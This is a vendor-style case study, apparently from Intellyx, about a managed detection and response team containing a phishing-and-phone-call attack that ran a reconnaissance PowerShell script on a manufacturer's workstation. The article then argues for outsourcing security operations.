Thwarted Phishing Attack Shuts the Door to Ransomware
No company is immune from a cyberattack, but with a quick response from a managed detection and response (MDR) service, the damage from a recent phishing attack was minimal.
The target: a global manufacturer of appliances for home and commercial use we’ll call Grumbach (companies generally like to remain anonymous when discussing their cybersecurity arrangements, and Grumbach is no exception).
Open Systems partners with Microsoft to deliver both its MDR and EDR services. The MDR service leverages Azure Sentinel and Open Systems’ curated workbooks to raise potential issues. The EDR service takes advantage of Microsoft Defender for Endpoint, which provides endpoint protection, endpoint detection and response and vulnerability management.
Cybersecurity tooling, however, is only part of the story. The quick action on the part of Open Systems security operations center (SOC) engineers caught this attack, preventing it from doing untold damage to Grumbach’s systems.
One June 10, 2021 at 11:50 AM local time, Microsoft Defender detected suspicious behavior on the workstation of a Grumbach employee. It then automatically created a ticket and raised an alert in the Open Systems’ SOC Portal.
A SOC engineer at Open Systems investigated the problem and rapidly identified the malicious intention behind this alert: a suspicious PowerShell routine running on the Grumbach employee’s computer.
The engineer proceeded to isolate the host immediately as authorized per the rules of engagement that Grumbach and Open Systems had defined together. Those rules allow Open Systems to take a certain number of reactive measures without prior approval, depending on the severity of the situation.
Isolating the host prevented it from causing further harm, and an initial assessment determined that the attack was contained and not affecting other hosts. The engineer was now able to dive into the investigation to get to the bottom of the attack.
This malicious routine was in the ‘recon’ phase, gathering information about Grumbach’s systems in order to mount the primary attack. This recon included identifying the public IP address, hostname, and administrator ID for the employee workstation.
Once this recon was complete, the malicious PowerShell script attempted to download malware from the Google Apps Script service – but was fortunately not able to proceed as the requested malicious file was not present.
Open Systems then requested that the Grumbach admin reset the target user’s credentials on his compromised computer and recommended restaging of the device (wiping it and then rebuilding it from a master image) to ensure the removal of any threat.
The Point of Compromise
Subsequent to the attack, Open Systems specialists conducted an investigation and determined that the original point of entry occurred when the Grumbach employee clicked a malicious link in a phishing email.
The email purported to be from a federal customs official, and it claimed that customs was holding a package for the employee at the border. It then instructed the target to click the malicious link in order to resolve the issue.
Nearly simultaneous to the employee receiving the malicious email, he also received a telephone call from someone claiming to be from customs, informing him of the email and again instructing him to click the link.
Even with this unusual dual-vector attack, the employee might have become suspicious, save for the fact that he was in truth waiting for a package from outside the country. Whether the attackers were aware of the package or simply got lucky with this fellow remains unknown.
Open Systems was previously aware of this type of attack. In fact, so was the their local customs office, which had posted a warning about it on its web site.
The malicious email was able to bypass the phishing protection in Microsoft 365. Unfortunately, Grumbach had chosen not to upgrade to Microsoft 365 Advanced Protection, which likely would have caught and filtered the phishing email.
The Intellyx Take
The techniques this attacker used – a phishing email, a malicious phone call, a malicious PowerShell script, and malware downloaded from the Google Apps Script service – are all common, simple, and reasonably unsophisticated.
As a result, mitigating this attack didn’t require a particularly expert response from Open Systems’ engineers as compared to more sophisticated attack. In contrast, the engineers’ actions were essentially routine.
One might wonder, therefore, whether Grumbach would be better off staffing their own SOC instead. Couldn’t they simply hire their own cybersecurity engineers?
The answer: bringing cybersecurity response in-house would not be cost-effective. It’s essential for SOCs to operate 24 x 7, an expensive proposition given the shortage of people with cybersecurity expertise – and as is typical, Grumbach required a rapid response to this threat
Add to that expense the tools such professionals need to adequately address the security needs of the organization and the requirement for a single pane of glass, and outsourcing MDR and EDR to a firm like Open Systems becomes a straightforward decision.